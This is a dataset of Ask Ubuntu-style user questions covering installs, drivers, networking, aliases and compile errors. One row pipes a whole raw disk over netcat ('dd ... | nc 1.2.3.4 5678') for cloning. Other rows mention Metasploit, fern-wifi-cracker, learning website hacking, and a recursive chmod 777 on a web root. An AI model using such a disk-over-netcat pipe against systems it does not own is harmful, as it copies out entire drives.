334784	/dev/ttyusb0 does n't exists	i have a problem to connected my ups to my usb port . this is information from my system . warun @ warun-ddpc : ~ $ uname -a linux warun-ddpc 3.8.0-27-generic # 40-ubuntu smp tue jul 9 00:17:05 utc 2013 x86_64 x86_64 x86_64 gnu/linux warun @ warun-ddpc : ~ $ cat /etc/issue ubuntu 13.04 \n \l warun @ warun-ddpc : ~ $ lsusb |grep serial bus 002 device 007 : id 0665:5161 cypress semiconductor usb to serial confirmed that it is this device by reconnect the cable dmesg : [ 72169.451629 ] usb 2-1.6 : new low-speed usb device number 7 using ehci-pci [ 72169.549517 ] usb 2-1.6 : new usb device found , idvendor=0665 , idproduct=5161 [ 72169.549522 ] usb 2-1.6 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 72169.549524 ] usb 2-1.6 : product : usb to serial [ 72169.549527 ] usb 2-1.6 : manufacturer : inno tech [ 72169.554498 ] hid-generic 0003:0665:5161.000d : hiddev0 , hidraw7 : usb hid v1.00 device [ inno tech usb to serial ] on usb-0000:00:1d.0-1.6/input0 [ 72685.019094 ] usbcore : registered new interface driver usbserial [ 72685.019104 ] usbcore : registered new interface driver usbserial_generic [ 72685.019110 ] usbserial : usb serial support registered for generic from /sys/devices/ : warun @ warun-ddpc : ~ $ ls -ltrad /sys/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.6 drwxr-xr-x 5 root root 0 aug 19 14:27 /sys/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.6 warun @ warun-ddpc : ~ $ ls /sys/bus/usb/devices/ -ltrah total 0 lrwxrwxrwx 1 root root 0 aug 19 14:27 usb4 - > ../../../devices/pci0000:00/0000:00:14.0/usb4 lrwxrwxrwx 1 root root 0 aug 19 14:27 usb3 - > ../../../devices/pci0000:00/0000:00:14.0/usb3 lrwxrwxrwx 1 root root 0 aug 19 14:27 usb2 - > ../../../devices/pci0000:00/0000:00:1d.0/usb2 lrwxrwxrwx 1 root root 0 aug 19 14:27 usb1 - > ../../../devices/pci0000:00/0000:00:1a.0/usb1 lrwxrwxrwx 1 root root 0 aug 19 14:27 4-0:1.0 - > ../../../devices/pci0000:00/0000:00:14.0/usb4/4-0:1.0 lrwxrwxrwx 1 root root 0 aug 19 14:27 3-0:1.0 - > ../../../devices/pci0000:00/0000:00:14.0/usb3/3-0:1.0 lrwxrwxrwx 1 root root 0 aug 19 14:27 2-0:1.0 - > ../../../devices/pci0000:00/0000:00:1d.0/usb2/2-0:1.0 lrwxrwxrwx 1 root root 0 aug 19 14:27 1-0:1.0 - > ../../../devices/pci0000:00/0000:00:1a.0/usb1/1-0:1.0 drwxr-xr-x 4 root root 0 aug 19 14:27 .. drwxr-xr-x 2 root root 0 aug 19 14:27 . lrwxrwxrwx 1 root root 0 aug 19 14:27 2-1:1.0 - > ../../../devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1:1.0 lrwxrwxrwx 1 root root 0 aug 19 14:27 2-1 - > ../../../devices/pci0000:00/0000:00:1d.0/usb2/2-1 lrwxrwxrwx 1 root root 0 aug 19 14:27 1-1.1:1.1 - > ../../../devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1/1-1.1:1.1 lrwxrwxrwx 1 root root 0 aug 19 14:27 1-1.1:1.0 - > ../../../devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1/1-1.1:1.0 lrwxrwxrwx 1 root root 0 aug 19 14:27 1-1:1.0 - > ../../../devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1:1.0 lrwxrwxrwx 1 root root 0 aug 19 14:27 1-1.1 - > ../../../devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1 lrwxrwxrwx 1 root root 0 aug 19 14:27 1-1 - > ../../../devices/pci0000:00/0000:00:1a.0/usb1/1-1 lrwxrwxrwx 1 root root 0 aug 19 14:27 1-1.2 - > ../../../devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.2 lrwxrwxrwx 1 root root 0 aug 19 14:27 1-1.6:1.0 - > ../../../devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.6/1-1.6:1.0 lrwxrwxrwx 1 root root 0 aug 19 14:27 1-1.6 - > ../../../devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.6 lrwxrwxrwx 1 root root 0 aug 19 14:27 1-1.2:1.2 - > ../../../devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.2/1-1.2:1.2 lrwxrwxrwx 1 root root 0 aug 19 14:27 1-1.2:1.1 - > ../../../devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.2/1-1.2:1.1 lrwxrwxrwx 1 root root 0 aug 19 14:27 1-1.2:1.0 - > ../../../devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.2/1-1.2:1.0 lrwxrwxrwx 1 root root 0 aug 20 10:30 3-3.3 - > ../../../devices/pci0000:00/0000:00:14.0/usb3/3-3/3-3.3 lrwxrwxrwx 1 root root 0 aug 20 10:30 3-3 - > ../../../devices/pci0000:00/0000:00:14.0/usb3/3-3 lrwxrwxrwx 1 root root 0 aug 20 10:30 2-1.6 - > ../../../devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6 lrwxrwxrwx 1 root root 0 aug 20 10:30 2-1.5 - > ../../../devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.5 lrwxrwxrwx 1 root root 0 aug 20 10:31 3-3.3:1.1 - > ../../../devices/pci0000:00/0000:00:14.0/usb3/3-3/3-3.3/3-3.3:1.1 lrwxrwxrwx 1 root root 0 aug 20 10:31 3-3.3:1.0 - > ../../../devices/pci0000:00/0000:00:14.0/usb3/3-3/3-3.3/3-3.3:1.0 lrwxrwxrwx 1 root root 0 aug 20 10:31 3-3:1.0 - > ../../../devices/pci0000:00/0000:00:14.0/usb3/3-3/3-3:1.0 lrwxrwxrwx 1 root root 0 aug 20 10:31 2-1.6:1.0 - > ../../../devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.6/2-1.6:1.0 lrwxrwxrwx 1 root root 0 aug 20 10:31 2-1.5:1.0 - > ../../../devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.5/2-1.5:1.0 however , it does n't show any /dev/ttyusb* . i 'm not sure what i have missing here .
334790	how can i disable the led lights of a usb webcam ?	i would like to disable the led lights on my v4l usb webcam . i would like to know if there is a generic method/way to handle that .
334795	ubuntu 13.04 on a preinstalled windows 8 system w/ uefi	i 've been trying to get ubuntu 13.04 to work on my desktop that came with windows 8 pre-installed and the uefi system . needless to say , i 'm having trouble . the desktop in question is an hp pavilion p6-2738 . it also seems that i need to get drivers somehow for the ethernet adapter , but that 's a whole different thread . i went into the bios/uefi editor and disabled secure boot , enabled legacy mode . during installation , ubuntu says it ca n't install grub2 , no matter where i tell it to install it . i 'm using the `` something else '' option and defining my own partitions . i have a seperate 160gib drive i 'm using for it , so maybe that 's the issue . i do n't know . any and all help is appreciated , as it 's late , and i 'm out of ideas . i 'm trying to get it to dual-boot btw . probably worth mentioning : p update : at the end of the installation , it says it 's completely removing , and occasionally purging stuff . i got it to install grub to a separate partition . i 'm not worried about getting an os selection screen yet , but just going directly into the boot selection screen and selecting my secondary drive to boot from , i get `` os failed to load '' .
334797	how can i setup a vpn server that will work with android 's built in vpn client ?	i have a ubuntu server and would like to run my own vpn on it that will be connectable using nothing but the built-in android vpn ( no apps )
334800	how to access unity theme details programmatically ?	what is the best approach to find about the details of theme which is currently in use in unity de ? example : icons , colors ... i do n't know much about the unity configurations and i assume that there must be some configuration option stored somewhere which defines options for a custom unity de theme for example path to a directory which icons or css files are stored ( and to parse those configuration files programmatically ) . thanks for your time .
334807	alias does n't work	i have written on .bash_aliases to run my shell script : alias testing='./testing ' problem i 'm having right now is that it wo n't run the shell script . on the terminal it says the `` command not found '' . may i know if anything wrong with what i 've typed ? edit : i 've found out that it only work after i typed source ~/.bashrc problem now is how do i run source ~/.bashrc upon starting of ubuntu when i log in ?
334808	.run file has no vfs data to start up	i downloaded metasploit 64 bit version for linux ( i have ubuntu 13.04 x64 installed ) . it comes as a .run file . as all of the tutorials say , i tried to install it as follows . sudo chmod a+x metasploit-latest-linux-x64-installer.run ./metasploit-latest-linux-x64-installer.run but i encountered the following error . i have tried many times , but same result in each attempt . i get the error message followed by a % prompt as follows . application-specific initialization failed : /home/djays/metasploit-latest-linux-x64-installer.run has no vfs data to start up % then i tried to install it using bash command . it also gives another error . metasploit-latest-linux-x64-installer.run : metasploit-latest-linux-x64-installer.run : can not execute binary file can anybody give me a solution . edit : as some answers said in the internet , i checked whether downloaded .run file is corrupted or not downloaded completely , and then i redownloaded it about 4 times . but still get the same result . i checked whether gvfs is installed , and the latest version is installed in my machine .
334815	can i continue working when backup is in progress ?	i would like to use ubuntu backup ( déjà dup ) to back up the whole system on an external hdd . can i use the os ( make changes to files ) while the full backup is being made ? how is this going to affect the backed up files ( for example , if i change a file during backup , would i have the new version of this file in the backup or the old one ) ? thank you
334822	âunable to locate packageâ errors for all software	i try to install programs with apt-get install but always it shows same error : unable to locate package . for example i try to install the language-support-fonts-fa ; here 's what happens : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package language-support-fonts-fa
334830	downloading ubuntu to os x , installing on a laptop with no os	as it says in the title , i want to install ubuntu on a windows laptop with no os . i 'd prefer to use a usb boot rather than a dvd . how can i create an appropriate usb boot stick from os x ?
334832	how to run source on terminal start up ?	i have alias ready on .bash_aliases . problem i 'm having right now is that i need to run source ~/. < filename > first before i can execute the alias command . my question would be how do i run the source ~/. < filename > when user opens terminal .
334838	artefacts while installing ubuntu	while installing ubuntu i have faced display problems , like on screenshot : thanks for any help !
334840	what does arrow in mysql require	it is my first times creating a database in mysql and i performed the following operations create database logs use logs create table from_dhcp ( host varchar ( 35 ) ) the result is an arrow which has frustrated me the whole morning , what does this arrow want me to do , i know it requires input but all i want to do for now is to create the table then display the table . ny help would be truly be appreciated
334849	how to send dhcpd leases to remote syslog-ng	i want to query a dhcp server for logs about leased ip’s every 5 minutes . i am not sure how to run the query from my server or which file to edit . the queried logs will be sent to the server and placed into a mysql database which i have created .
334862	ubuntu or backtrack ? for learn website hacking	i want to learn website hacking . i did n't use linux so far . for start in your opinion i install ubuntu or backtrack ? thanks
334864	i can not install ubuntu on my laptop	i bought a dell inspiron 5423 ultrabook with a 32gb ssd drive and a 500gb hdd . i tried to install ubuntu with a live cd , but there is no drive shown on which to install ubuntu . in my boot options i changed the boot option from uefi to legacy . i also changed the sata option to ata , but it 's still not working .
334869	white and red lines across the top of the screen with 13.04 on an intel machine	i have just installed ubuntu 13.04 on an intel pc which had no os on it at the time of installation . the os looks great and i 'm really looking forward to getting stuck in with it , but i 've got a display issue i ca n't resolve . there is a series of white and red lines running from left to right at the top of the screen . is this a known issue that someone can advise me on ? thanks in advance , d i do n't know how to upload an image of it . sorry .
334877	pulse audio stream not entering in active state	i create stream in pulse audio using pa_stream_new , set it for monitoring sink input and finally connected for recording . but i get stream state as pa_stream_creating and it ca n't change to pa_stream_ready . so my program only printing stream is creating infinite times any guess why it happens ... . ? code snapshot : stream=pa_stream_new ( context , '' record '' , & pss , null ) ; pa_stream_set_monitor_stream ( stream , ind ) ; printf ( `` record : % d '' , pa_stream_connect_record ( stream , '' alsa_output.pci-0000_00_1b.0.analog-stereo.monitor '' , null,0 ) ) ; if ( pa_stream_ready==pa_stream_get_state ( stream ) ) { printf ( `` stream ready : '' ) ; pa_stream_set_read_callback ( stream , pa_read_cb , ( void* ) f ) ; } if ( pa_stream_creating==pa_stream_get_state ( stream ) ) printf ( `` stream is creating '' ) ; while doing this i am checking context connection with pulse and it 's ok ...
334884	while compiling truecrypt , i get `` undefined reference to symbol 'dlclose @ @ glibc_2.2.5 ' ''	i 'm trying to compile truecrypt 7.1a from source on ubuntu 13.04 . however make fails during the linking process with the following error : linking truecrypt /usr/bin/ld : /home/user/truecrypt-7.1a-source/tc2/volume/volume.a ( securitytoken.o ) : undefined reference to symbol 'dlclose @ @ glibc_2.2.5' /usr/bin/ld : note : 'dlclose @ @ glibc_2.2.5 ' is defined in dso /lib/x86_64-linux-gnu/libdl.so.2 so try adding it to the linker command line /lib/x86_64-linux-gnu/libdl.so.2 : could not read symbols : invalid operation collect2 : error : ld returned 1 exit status make [ 1 ] : *** [ truecrypt ] error 1 make : *** [ all ] error 2 how do i fix that ?
334886	why i do get error 101 ? how is my dns involved ?	i was getting update information is outdated alert . i tried sudo apt-get update and got these errors : w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/release.gpg can not initiate the connection to security.ubuntu.com:80 ( 2001:67c:1562 : :13 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :13 80 ] w : failed to fetch http : //repository.spotify.com/dists/stable/release.gpg something wicked happened resolving 'repository.spotify.com : http ' ( -11 - system error ) w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/main/i18n/translation-en_in can not initiate the connection to security.ubuntu.com:80 ( 2001:67c:1562 : :13 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :13 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/main/i18n/translation-en can not initiate the connection to security.ubuntu.com:80 ( 2001:67c:1562 : :13 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :13 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/multiverse/i18n/translation-en_in can not initiate the connection to security.ubuntu.com:80 ( 2001:67c:1562 : :13 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :13 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/multiverse/i18n/translation-en can not initiate the connection to security.ubuntu.com:80 ( 2001:67c:1562 : :13 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :13 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/restricted/i18n/translation-en_in can not initiate the connection to security.ubuntu.com:80 ( 2001:67c:1562 : :13 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :13 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/restricted/i18n/translation-en can not initiate the connection to security.ubuntu.com:80 ( 2001:67c:1562 : :13 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :13 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/universe/i18n/translation-en_in can not initiate the connection to security.ubuntu.com:80 ( 2001:67c:1562 : :13 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :13 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/universe/i18n/translation-en can not initiate the connection to security.ubuntu.com:80 ( 2001:67c:1562 : :13 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :13 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/universe/source/sources can not initiate the connection to security.ubuntu.com:80 ( 2001:67c:1562 : :13 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :13 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/main/source/sources can not initiate the connection to security.ubuntu.com:80 ( 2001:67c:1562 : :13 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :13 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/multiverse/source/sources can not initiate the connection to security.ubuntu.com:80 ( 2001:67c:1562 : :13 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :13 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/restricted/source/sources can not initiate the connection to security.ubuntu.com:80 ( 2001:67c:1562 : :13 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :13 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/main/binary-i386/packages can not initiate the connection to security.ubuntu.com:80 ( 2001:67c:1562 : :13 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :13 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/restricted/binary-i386/packages can not initiate the connection to security.ubuntu.com:80 ( 2001:67c:1562 : :13 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :13 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/universe/binary-i386/packages can not initiate the connection to security.ubuntu.com:80 ( 2001:67c:1562 : :13 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :13 80 ] w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/raring-security/multiverse/binary-i386/packages can not initiate the connection to security.ubuntu.com:80 ( 2001:67c:1562 : :13 ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1562 : :13 80 ] e : some index files failed to download . they have been ignored , or old ones used instead . i followed this thread 's top answer and it fixed the problem . but someone please explain what was the problem and how did it got fixed ?
334891	how to copy all , also hidden files , from another server using ssh ( as sudoer not root ) ?	i am slowly dying from this task . i had to migrate websites from one server to another . my boss made that the last time ( he is root ) and he said , it 's simple ... just dump mysql db and restore on other server and copy all content from the website . so did i do . but linking inside of the web content somehow fails for some links . so i guess that i miss some hidden files i ca n't see on the old server . ( new server has ubuntu 12.04 with php 5.3.10 , old server has ubuntu 10.10 with php 5.3.3 ) to copy the files i used : sudo rsync -av user @ old.com : /var/somedir/* /var/somedir/ then i found out that the * maybe misses some hidden files . so i tried another time : sudo rsync -avz user @ old.com : /var/somedir/ /var/somedir/ ( now without * and with compression ) after that i made the full directory -r chmod 777 to give allllllll permissions also php : allow_url_fopen is on but still the same output . is there maybe anyone who had the same problem ? i first thought it might be a php problem . but now i guess it 's not . some functions are decrepated ... but thats it . any help is upvoted immediately . thanks in advance . here from my apache2 errorlog : php warning : include ( modules/mdl_users/settings.conf.php ) : failed to open stream : no such file or directory in /data/lbvoting/www/classes/module.class.php on line 35 php warning : include ( ) : failed opening 'modules/mdl_users/settings.conf.php ' for inclusion ( include_path= ' . : /usr/share/php : /usr/share/pear ' ) php warning : variable passed to each ( ) is not an array or object in /data/lbvoting/www/classes/module.class.php on line 36 php warning : include ( dictionary/.lng.php ) : failed to open stream : no such file or directory in /data/lbvoting/www/modules/users/frontend.class.php on line 20 php warning : include ( ) : failed opening 'dictionary/.lng.php
334892	trouble installing gcc 4.8.1	i installed gcc as described below . it installed pretty well , but when i call gcc -v it just shows the former version gcc4.6.3 . i do not know where to find the installation so that i can make a link to call it . tar xzf gcc-4.6.2.tar.gz cd gcc-4.6.2 ./contrib/download_prerequisites cd .. mkdir objdir cd objdir $ pwd/../gcc-4.6.2/configure -- prefix= $ home/gcc-4.6.2 make make install all were done from my home directory .
334897	needed help for ubuntu download and installation	i want to download and install ubuntu on an old gateway computer . it has windows me on it now . so my question is : will the ubuntu run on this machine properly ? it took like 2 hours to download . i have also downloaded the installer which when clicked it does n't open up . can anyone suggest what exactly i had done wrong ?
334899	how to put a link to my ftp server on 12.04 desktop ?	how do i put a link to my ftp server on my desktop so when i drag and drop or copy and paste files to ? i want to be able to move files off my system when needed . i did this on my 10.04 install with ease but 12.04 i can not figure out how to go about doing it. ? ? ? thanks everyone for any and all help..
334902	12.04 update and nvidia	i 've just have had nasty surprise of graphics not working after latest update ( bringing it up to kernel version 3.2.0-52-generic ) . apparently after the update it was expecting nvidia-319 driver , while it seems to me that on 12.04 nvidia-current points to nvidia-304 . thus i had to manually install nvidia-319 and uninstall nvidia-304 . is this because i 've have messed up something in my configuration or is it known issue ?
334904	find installed documentation	where can i find the installed documentation for a library that i have installed ? for example : in synaptic package manager , i have installed opencv-doc . where can i find this documentation .
334907	windows home server mount do n't work properly	i want to permanently mount my windows home server folders . my account work properly on every windows machine and this is the first time i want to mount it on linux . for every shared folder i make a rule in fstab : //192.168.1.3/downloads /home/janco/mnt/downloads cifs username=janco , password= -- - 0 0 //192.168.1.3/pictures /home/janco/mnt/afbeeldingen cifs username=janco , password= -- - 0 0 //192.168.1.3/films /home/janco/mnt/films cifs username=janco , password= -- - 0 0 //192.168.1.3/music /home/janco/mnt/music cifs username=janco , password= -- - 0 0 //192.168.1.3/serie 's /home/janco/mnt/series cifs username=janco , password= -- - 0 0 //192.168.1.3/videos /home/janco/mnt/videos cifs username=janco , password= -- - 0 0 the mount works , i can read my files . but when i try to create a direcotry or change a file , i get a permission error : acces denied . i have change the permission of the `` /mnt '' folder ( with chmod ) but this does n't help . i can create a folder in the mnt folder , but not in a shared folder . what could be the problem ? some information about the server : os : windows home server 2011 static ip : 192.168.1.3 server name : fileserver
334910	windows to ubuntu	so i have an old windows vista laptop on which i decided to try ubuntu . i thought i had got it right , but the windows os is still there . i know it works alright as it is , but i 'd like a fresh start with my pc , without the windows part . there is only one hdd in this computer , with both ubuntu and windows . i noticed that after i installed ubuntu , my hdd seemed to have split into two partitions ( is this of any point ? ) i wonder if i just format the hdd will i loose my ubuntu installation ? will it not be able to complete ? will it not format the partitions ? should i just format the entire pc using a bootable usb-stick and then install ubuntu likewise ? if that 's the case , is there an iso file somewhere that will do both or will i have to do this in two separated actions ? like ... first making a bootable usb for formatting , and then making an other one to install ubuntu ( again ) ? i have to problem to lose everything that 's on the hdd whatsoever . i just need a fresh hdd with ubuntu , and the easiest way to do it ?
334916	hyper-v ubuntu 12.04 : mouse scroll wheel doesnt work	i 've been trying to setup an ubuntu 12.04 workstation on a hyper-v virtual machine ( ms windows server 2008 r2 ) and i need some help with the mouse driver . the mouse responds fine in general : the cursor 's moving , left/right click works ok and also when i press the wheel windows are changing and tabs are closing . everything except scrolling : then nothing happens , except that the cursor 's appearing on the upper left corner of my vm desktop and when i move the mouse it appears back where it was . can someone guide me how to solve this ? it gets really annoying ... thanks !
334923	change location of system partition to install windows on top of linux	i was following this answer to install windows on top of my existing linux installation . however , while running the windows 7 installer it complains that the partition i am installing on is not a 'system ' partition . i have two hds , set up like so : sda ( 1 tb ) - sda1 ntfs ( 500 gb ) < -- windows 7 goes here - sda2 lvm ( 500 gb ) < -- storage sdb ( 128 gb ) - sdb1 lvm < -- linux installation ( also boot flag in gparted ) the windows 7 installer marks sdb1 as the system partition . what do i need to do to move the system partition to sda so that i can install windows ?
334930	latest ubuntu versions and nvidia fx5500	i recently installed ubuntu 12.04 on my home pc ( the pc ca n't boot from usb and it does n't have a working dvd reader so i ca n't install 13.04 , it 's 8 years old ) the pc has a 3 ghz pentium 4 cpu and a nvidia fx5500 graphics card . i updated it with the latest fixes and decided to start upgrading to 12.10 and 13.04 . during the upgrade it warned me that i might have stability issues with my gpu . after the upgrade , lightdm would no longer start and instead it would drop to a random color background with just a cursor . i 've read that the 173 driver for this card is incompatible with the latest xorg version but i 've seen 13.04 work with other cards under the 173 driver before , so why does the fx5500 have issues . also even in 12.04 i have minimum desktop effects even though the card is fully capable of running them . ps : since everything else works good in 12.04 , i could just stick with it , but is there any chance of a fix in future releases until support ends for 12.04
334931	where are downloaded files stored ?	today i installed 12.10 as my second os . i made all updates and upgrades . then i downloaded crunch-3.4tgz and fern-wifi-cracker 1.6 all.deb but i could nowhere find these files to be able to install the applications . searching ask ubuntu did not help me . everytime i follow any guide i get the error no such file or directory . my box seems not to see these files even though i had placed them on my desktop . where can i find them ?
334932	how do i bring back my internet connection ?	i lost my wireless internet connection from my home today . i went in and deleted the connection hoping it would pop back up again when i restarted my computer . no go . still works on the office wireless , but at home no go . running ubuntu 12.04 on a dell insperion 14. iwconfig results ( do n't know if this helps but ... ) : lo no wireless extensions . eth1 ieee 802.11abg essidff/any mode : managed access point : not-associated retry long limit:7 rts thrff fragment thrff power managementn eth0 no wireless extensions . here 's what i get on my search for network controller : 06:00.0 network controller : broadcom corporation device 4365 ( rev 01 )
334934	mobile broadband wo n't connect	i 'm using an old laptop which i recently upgraded from ubuntu 11.10 to ubuntu 13.04 . i updated everything and it all seems fine but after trying to connect mobile broadband ( optus prepaid ) through my huwaei e160e dongle , it does n't recognize it or give an enable wireless broadband option in the network settings . this worked fine in my old install and i was wondering what i could do to fix it . it 's frustrating as i ca n't connect to the net to try and download a fix so was wondering what to do . any help appreciated .
334941	how to combine multiple commands in terminal ?	i have the following commands . cd import zcat urls1.sql.gz | mysql -u root -p urls cd /var/www/project1/ nano 1.php as of now i 'm executing it one by one . is there a way to combine those commands in one line ?
334942	`` bad file descriptor '' with /dev/stdin using dd	i 've been using this method ( running off a live cd on both ends , and in root shell , as suggested in another of my questions ) to clone one computer i 've got set up to my liking to four others with the same hardware . the first two clonings went smoothly , but when i try the sudo dd if=/dev/sda of=/dev/stdout | nc 1.2.3.4 5678 ( with the correct ip , of course ) on the third computer to clone , after a short delay i 'm greeted with the root @ ubuntu : ~ # prompt again , rather than having to wait ~3 hours as it actually does the cloning . when i ctrl+c out of the nc on the receiving end , here 's what i see : 0+0 records in 0+0 records out 0 bytes ( 0 b ) copied , 1.6317 s , 0.0kb/s dd : closing input file '/dev/stdin ' : bad file descriptor the other clonings went fine , and all the computers i 'm cloning to should be identical other than in name/ip address etc ( although i 'm only human , and may have set them up slightly differently by accident , hence why i 'm cloning to ensure they 're all the same in the end ) . any idea why this one particular computer refuses to be cloned to ( or why the sender refuses to clone to it ? )
334946	repacked proprietary software keeps updating the same deb	i repacked a proprietary program delivered as tar file to a deb file for having a company wide repository . i used reprepro to set up a repository and signed it . a unix timestamp is faking a versioning numbering , so i can have different ( real ) versions installed at the same time . almost everything works as expected . the deb file looks like this : mysoft8.0v6_1366455181_amd64.deb only problem on a client machine it tries to install the same deb file over and over again because it thinks its an update . what do i miss : control file in deb package looks like this : package : mysoft8.0v6 version : 1366455181 section : base priority : optional architecture : amd64 installed-size : 1272572 depends : maintainer : me description : mysoft 8.0v6 dpkg repackaging and the config in the repository : /mirror/mycompany.inc/conf/distributions : origin : apt.mycompany.inc label : apt repository codename : precise architectures : amd64 i386 components : main description : mycompany debian/ubuntu package repo signwith : yes pull : precise help much appreciated added guide : this is the guide i used to create the repository .
334950	using a flash drive to boot up ubuntu	i would like to know if it is possible to put ubuntu on a flashdrive and bootup from that instead of burning a disc ? thanks
334952	how do i configure the /etc/network/interfaces file ?	i tried to access a wireless device on my kubuntu system and i have no access network to the network . i gave up on wireless and went back to my wired connection . how do i add a device to /etc/network/interfaces so that /etc/init.d/networking start will restart my network interfaces ? many thanks , steve
334954	help dual booting windows 8 and ubuntu 12.04	i am experiencing difficulties to dual boot y hp laptop . i have installed windows 8 and ubuntu 12.04 by allocating free memory to ubuntu . now i can not boot to ubuntu . upon startup , ubuntu is unable to boot and i am straight away booted into windows 8 . i tried easybcd , but it did not work . i have also tried boot repair and got the following result : http : //paste.ubuntu.com/6006294/ please help as i am unable to boot to ubuntu . i have a genuine windows 8 , so want to enjoy ubuntu alongside windows .
334958	/etc files keep reverting after changes	my problem is when i configure a file in /etc , for instance , i made changes , with sudo , in /etc/default/l2tp-ipsec-vpn-daemon well , after restarting i noticed the changes i made are not applied and i found a new file /etc/default/l2tp-ipsec-vpn-daemon~ beside my original file , and that file with the tilde at the end contains the initial configuration which is apparently applied instead of my changed file . this problem exists for every change i madke in /etc folder .
334968	trying to compile powertop for arm using cross compile in ubuntu with malloc issue	i have been trying to compile powertop for an arm device . i saw powertop talked about here quite a bit and i am using ubuntu to cross compile for the armv7l . the configure goes through checking and produces : checking for uint32_t ... yes checking for uint64_t ... yes checking for stdlib.h ... ( cached ) yes checking for gnu libc compatible malloc ... no checking for stdlib.h ... ( cached ) yes checking for unistd.h ... ( cached ) yes checking for sys/param.h ... yes checking for getpagesize ... yes checking for working mmap ... no checking for stdlib.h ... ( cached ) yes checking for gnu libc compatible realloc ... no checking for working strtod ... no checking for pow ... yes it gets to the devlist.cpp and dies because of the malloc not being there . ... cxx cpu/powertop-intel_cpus.o cxx powertop-devlist.o devlist.cpp : in function ‘void collect_open_devices ( ) ’ : devlist.cpp:147 : error : ‘rpl_malloc’ was not declared in this scope devlist.cpp : in function ‘void register_devpower ( const char* , double , device* ) ’ : devlist.cpp:249 : error : ‘rpl_malloc’ was not declared in this scope make [ 3 ] : *** [ powertop-devlist.o ] error 1 make [ 3 ] : leaving directory `/home/lucid/powertop-2.4/src' make [ 2 ] : *** [ all ] error 2 ... if i make it skip the devlist.cpp then i get other memory function issues just like above . i guess my question is how might i change the configuration or make to use the malloc correctly ? do i need to build another library ? my toolchain should have every thing i need . i call configure and make like this : ./configure -- prefix=/home/lucid/timesys/i_mx53start/toolchain -- sysconfdir=/home/lucid/timesys/i_mx53start/toolchain/etc -- disable-static -- target=armv7l-timesys-linux -- host=i686 -- build=armv7l-timesys-linux & & make
334969	juju error : flag provided but not defined : -- force-machine	i am running command , > juju deploy -- config ceph.yaml -- force-machine 1 local : ceph-osd which giving me error error : flag provided but not defined : -- force-machine any idea ? if its syntax error or something else ? my juju verson is 1.13.1-raring-amd64 .
